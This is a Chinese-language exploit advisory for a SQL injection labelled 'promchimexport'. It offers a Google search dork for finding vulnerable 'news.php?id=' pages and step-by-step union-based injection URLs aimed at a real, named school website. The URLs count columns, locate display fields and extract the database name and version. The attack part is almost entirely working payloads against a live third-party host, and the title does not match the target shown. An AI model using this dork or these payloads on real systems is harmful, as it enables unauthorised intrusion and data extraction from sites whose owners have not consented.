promchimexport - SQL注入
2025年12月24日 提交者: javad rashidi
风险等级: 中
本地利用: 否
远程利用: 是
CVE编号: N/A
CWE编号: N/A
Google搜索关键词: inurl:"news.php?id="
漏洞信息
漏洞标题: promchimexport - SQL注入
发现日期: 2025-12-23
漏洞作者: javad rashidi
测试平台: Windows,Linux
Google搜索关键词: inurl:"news.php?id="
漏洞验证与利用示例
以下是通过构造特定参数对目标网站进行SQL注入测试的示例URL,展示了从探测到信息提取的过程:
-
判断字段数量:
1https://paramekkavuvidyamandir.edu.in/news.php?id=129%27+order+by+8--+此链接用于判断当前查询语句中使用的字段数量(本例中通过递增
order by后的数字进行探测,最终确认有8个字段)。 -
确定显示位:
1https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,2,3,4,5,6,7,8--+此链接将原始查询结果设置为空(
id=-129),并联合查询1至8的数字,目的是找出在网页前端显示出来的字段位置(即“显示位”)。 -
提取关键信息:
1https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,database(),version(),4,5,6,7,8--+在确定了显示位(例如位置2和3)后,构造此链接,利用
union select语句将数据库名(database())和数据库版本(version())注入到可显示的字段中,从而从服务器获取这些敏感信息。
注意: 所有示例URL中的
%27是单引号'的URL编码,--+用于注释掉SQL语句的后续部分。